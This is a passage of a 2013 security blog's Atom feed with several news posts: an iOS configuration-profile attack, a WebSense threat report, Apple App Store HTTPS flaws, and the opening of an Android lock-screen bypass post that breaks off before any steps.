&lt;li style="margin: 0px; outline: none; padding: 0px;"&gt;&lt;span style="font-family: inherit; white-space: pre-wrap;"&gt;Victims receive a mail that promises them a “better battery performance” or just “something cool to watch” upon installation.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #333333;"&gt;&lt;span style="line-height: 19px; white-space: pre-wrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-x9vp53rzI-k/UUIfqRCgsDI/AAAAAAAABCc/fbwbaf7P9g4/s1600/hack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="295" src="http://2.bp.blogspot.com/-x9vp53rzI-k/UUIfqRCgsDI/AAAAAAAABCc/fbwbaf7P9g4/s400/hack.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h4 style="text-align: left;"&gt;
To avoid this attack one must follow these rules:&lt;/h4&gt;
&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;You should only install profiles from trusted websites or applications.&lt;/li&gt;
&lt;li&gt;Make sure you download profiles via a secure channel (e.g., use profile links that start with https and not http).&lt;/li&gt;
&lt;li&gt;Beware of non-verified mobileconfigs. While a verified profile isn't necessarily a safe one, a non-verified should certainly raise you suspicion.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Cheers!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;About the Author:&lt;/b&gt;&lt;br /&gt;
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NRtaRx3uAeU:EsRwSGIbIw0:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NRtaRx3uAeU:EsRwSGIbIw0:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NRtaRx3uAeU:EsRwSGIbIw0:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NRtaRx3uAeU:EsRwSGIbIw0:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NRtaRx3uAeU:EsRwSGIbIw0:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/NRtaRx3uAeU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/2674025473766105594/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/vulnerability-discovered-in-iphone.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2674025473766105594?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2674025473766105594?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/NRtaRx3uAeU/vulnerability-discovered-in-iphone.html" title="Vulnerability Discovered In iPhone - Poses Serious Threat To Users" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-mdeXi9Z3G_Y/UUIfkDP5MLI/AAAAAAAABCU/c85ZAR761tI/s72-c/vulnerability.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/vulnerability-discovered-in-iphone.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0EGR3Y5eip7ImA9WhBQEk0.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-1707009763556054868</id><published>2013-03-13T00:30:00.000-07:00</published><updated>2013-03-13T14:20:26.822-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-13T14:20:26.822-07:00</app:edited><title>600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-qjSyBsEJVko/UT8gQtKU-JI/AAAAAAAABBg/OLtrr_awdVI/s1600/GeoGrowthInfectedSites.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="324" src="http://4.bp.blogspot.com/-qjSyBsEJVko/UT8gQtKU-JI/AAAAAAAABBg/OLtrr_awdVI/s640/GeoGrowthInfectedSites.bmp" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and elimination of the threat. Ahh! The moment you come to the realisation that there are smarter people in this world who can shoot you point-blank without ever being caught. Yes, brutality is the name, the name of the game!&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
WebSense has kept up to speed in this game and they have &lt;b&gt;&lt;a href="http://www.websense.com/content/websense-2013-threat-report.aspx" rel="nofollow" target="_blank"&gt;released a report&lt;/a&gt;&lt;/b&gt; to show for it. WebSense has released the 2013 Threat report enumerating an analysis on cyber threats. According to WebSense, cyber threats have increased over the years due to usage of ancient security protocols. Attackers are able to easily bypass these mechanisms and target mobile platforms and social media, the two most celebrated inventions of this century.&lt;br /&gt;
&lt;br /&gt;
Internet has been reported to be the 'attack vector and the primary support element of other attack trajectories'. Malicious websites have grown in number (almost 600%) and 85% of these are being hosted by legitimate but compromised providers.&lt;br /&gt;
&lt;br /&gt;
Genre of sites that were mainly attacked were:&lt;br /&gt;
&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Information Technology&lt;/li&gt;
&lt;li&gt;Business and Economy&lt;/li&gt;
&lt;li&gt;Sex&lt;/li&gt;
&lt;li&gt;Travel&lt;/li&gt;
&lt;li&gt;Shopping&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Probably because attackers wanted to cover all areas of human psyche and, in general, life? No wonder the number of threats and attacks have increased.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;- Social Media&lt;/b&gt; was one of the most exploited channels due to its large audience. Most of the links consisted of malicious content which were spread through the network. New features and interfaces also resulted in some amount of confusion leading to successful attacks on the user.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;- Mobile Platform&lt;/b&gt; were again easily attacked due to jailbreaking, and download and installation of malicious apps.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style="line-height: 19px; margin: 2em; padding: 0.1em 1.5em; position: relative; text-align: -webkit-auto;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-wH66v2hpv6w/UT8gP2IH1hI/AAAAAAAABBU/0ujtDra9cxM/s1600/MobileUSe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="268" src="http://4.bp.blogspot.com/-wH66v2hpv6w/UT8gP2IH1hI/AAAAAAAABBU/0ujtDra9cxM/s640/MobileUSe.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="margin-bottom: 1em; margin-top: 1em; padding: 0px;"&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-family: inherit;"&gt;Legitimate apps were also a cause for concern; many proved less secure than expected. Consider a study by Philipps University and Leibniz University in Germany involving 13,500 free apps downloaded from Google Play. Researchers found that 8 percent of these apps were vulnerable to&amp;nbsp;man-in-the-middle&amp;nbsp;attacks, and approximately 40 percent enabled the researchers to capture credentials for American Express, Diners Club, Paypal, bank accounts, Facebook,Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, remote control servers, arbitrary email accounts, and IBM Sametime, among others.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="font-size: 13px; line-height: 19px; margin-bottom: 1em; margin-top: 1em; padding: 0px; text-align: -webkit-auto;"&gt;
&lt;span style="background-color: white; font-size: small; line-height: normal; text-align: left;"&gt;&lt;span style="font-family: inherit;"&gt;WebSense stated that malicious apps mainly require three permissions:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 19px; margin-bottom: 1em; margin-top: 1em; padding: 0px; text-align: -webkit-auto;"&gt;
&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="background-color: white; line-height: normal; text-align: left;"&gt;&lt;span style="font-family: inherit;"&gt;82% of malicious apps send, receive, read or write SMS message.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-align: left;"&gt;&lt;span style="font-family: inherit;"&gt;12.5% malicious apps require RECEIVE_WAP_PUSH permission.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-align: left;"&gt;&lt;span style="font-family: inherit;"&gt;10% malicious apps asked for permission to install other apps.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;- Email&lt;/b&gt; was another vector that took to WebSense's notice as only 20% of the emails sent and received were legitimate. 80% were phishing and spam emails. It is very easy to fall pry to such attacks because the links present in these emails seem to be from "real people" but basically consist of links to compromised websites or the attachments present in them are infected.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-ovqe81nj7nY/UT8gPRymLVI/AAAAAAAABBQ/zzYBIII-L0Y/s1600/EmailTheats.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="316" src="http://2.bp.blogspot.com/-ovqe81nj7nY/UT8gPRymLVI/AAAAAAAABBQ/zzYBIII-L0Y/s640/EmailTheats.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Report also introduced "time-delay" attack, "in which embedded web links are kept benign until after traditional email security defences are bypassed".&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
According to WebSense the following categories of malicious web links are present in Spam Email:&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Potentially Damaging Content | Suspicious sites with little or no useful content.&lt;/li&gt;
&lt;li&gt;Web and Email Spam | Sites used in unsolicited commercial email.&lt;/li&gt;
&lt;li&gt;Malicious Websites | Sites containing malicious code.&lt;/li&gt;
&lt;li&gt;Phishing and other Frauds | Sites that counterfeit legitimate sites to elicit user information.&lt;/li&gt;
&lt;li&gt;Malicious Embedded iFrame.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;You can &lt;b&gt;read the full report by WebSense&lt;/b&gt; which clearly states;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;“Solutions that focus solely on mobile, email, web or otherwise can no longer be trusted to defend against complex, multistage attacks that can move between attack vectors.”&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;Wise friends, we are no longer... ALONE!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;Cheers!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;b&gt;&lt;span style="font-family: inherit;"&gt;About the Author:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ul style="font-size: 13px; line-height: 19px; list-style: none inside; margin: 1em 0px; padding: 0px 1em; text-align: -webkit-auto;"&gt;
&lt;li style="background-color: #3c3c3c; color: #999999; font-family: 'Lucida Grande', Helvetica, Arial, sans-serif;"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AkAohidOhdw:Zy5EhK81TWI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AkAohidOhdw:Zy5EhK81TWI:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AkAohidOhdw:Zy5EhK81TWI:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AkAohidOhdw:Zy5EhK81TWI:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AkAohidOhdw:Zy5EhK81TWI:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/AkAohidOhdw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/1707009763556054868/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/600-increase-in-cyber-attacks-websense.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1707009763556054868?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1707009763556054868?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/AkAohidOhdw/600-increase-in-cyber-attacks-websense.html" title="600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-qjSyBsEJVko/UT8gQtKU-JI/AAAAAAAABBg/OLtrr_awdVI/s72-c/GeoGrowthInfectedSites.bmp" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/600-increase-in-cyber-attacks-websense.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0YCRn4_fip7ImA9WhBQFUw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3797669265033617186</id><published>2013-03-10T12:17:00.000-07:00</published><updated>2013-03-17T03:12:47.046-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-17T03:12:47.046-07:00</app:edited><title>Vulnerabilities Fixed in App Store Almost After A Year</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-TJWW7ipIHsM/UTzRjp2hBWI/AAAAAAAABBA/7tv45GOyD30/s1600/apple_bug.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="http://4.bp.blogspot.com/-TJWW7ipIHsM/UTzRjp2hBWI/AAAAAAAABBA/7tv45GOyD30/s400/apple_bug.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
It is being reported that Apple has ignored its network's security for more than a year. A problem that a &amp;nbsp;Google developer has pointed out.&lt;br /&gt;
&lt;br /&gt;
Google Researcher, Elie Bursztein has stated on this &lt;b&gt;&lt;a href="http://elie.im/blog/web/apple-finally-turns-https-on-for-the-app-store-fixing-a-lot-of-vulnerabilities/#.UTzPIqWpWfT" rel="nofollow" target="_blank"&gt;blog&lt;/a&gt;&lt;/b&gt; that he had informed Apple of the security problems present in App Store that allowed attackers to steal passwords and/or install unwanted or expensive applications. &lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;This was done by exploiting Apple's resistance to use encryptions when any iDevice logged into App Store. This allowed the attacker to intercept communication occurring between an online user's device and App Store and insert his own commands into the system.&lt;br /&gt;
&lt;br /&gt;
The vulnerability could be exploited to carry out quite a few attacks on the user&lt;b&gt;&lt;a href="http://elie.im/blog/web/apple-finally-turns-https-on-for-the-app-store-fixing-a-lot-of-vulnerabilities/#.UTzPIqWpWfT" rel="nofollow" target="_blank"&gt; according to Elie&lt;/a&gt;&lt;/b&gt;:&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;Password stealing&lt;/strong&gt;: Trick the user into disclosing his or her password by using the application update notification mechanism to insert a fake prompt when the App Store is launched.&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;App swapping&lt;/strong&gt;: Force the user to install/buy the attacker’s app of choice instead of the one the user intended to install/buy. It is possible to swap a free app with a paid app.&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;App fake upgrade&lt;/strong&gt;: Trick the user into installing/buying the attacker’s app of choice by inserting fake app upgrades, or manipulating existing app upgrades.&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;Preventing application installation&lt;/strong&gt;: Prevent the user from installing/upgrading applications either by stripping the app out of the market or tricking the app into believing it is already installed.&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: inherit;"&gt;-&amp;nbsp;&lt;strong&gt;Privacy leak&lt;/strong&gt;: The App Store application update mechanism discloses in the clear the list of the applications installed on the device.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Apple responded to Elie's reports by switching on HTTPS for App Store only last week after a year of stalling appropriate decisions.&lt;br /&gt;
&lt;br /&gt;
Cheers!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;About the Author:&lt;/b&gt;&lt;br /&gt;
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ml7MZ9DpKH0:99tnS50pF3M:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ml7MZ9DpKH0:99tnS50pF3M:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ml7MZ9DpKH0:99tnS50pF3M:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ml7MZ9DpKH0:99tnS50pF3M:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ml7MZ9DpKH0:99tnS50pF3M:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/ml7MZ9DpKH0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3797669265033617186/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/vulnerabilities-fixed-in-app-store.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3797669265033617186?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3797669265033617186?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/ml7MZ9DpKH0/vulnerabilities-fixed-in-app-store.html" title="Vulnerabilities Fixed in App Store Almost After A Year" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-TJWW7ipIHsM/UTzRjp2hBWI/AAAAAAAABBA/7tv45GOyD30/s72-c/apple_bug.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/vulnerabilities-fixed-in-app-store.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEEDQXo8eip7ImA9WhBRF0o.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-2987343850050445575</id><published>2013-03-08T13:04:00.001-08:00</published><updated>2013-03-08T13:04:30.472-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-08T13:04:30.472-08:00</app:edited><title>How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Z_mQ87RcbfU/UTpRqgijkPI/AAAAAAAABAw/xckX1_10k2k/s1600/Android-4.1-Jelly-Bean-Logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-Z_mQ87RcbfU/UTpRqgijkPI/AAAAAAAABAw/xckX1_10k2k/s400/Android-4.1-Jelly-Bean-Logo.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: inherit;"&gt;Do you want to elude Note II's security even for a brief moment? &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/02/how-to-dodge-ios-612-passcode.html" target="_blank"&gt;With iOS 6.1.2 being owned by hackers&lt;/a&gt;&lt;/b&gt;, it was time that someone took a look at Android's vulnerabilities.&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;The method that we are going to explain to you to bypass Android's security was found by Terence Eden on Samsung Galaxy Note II running Android 4.1.2. It allows users to temporarily get around the phone's lock screen without a password.&lt;/span&gt;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
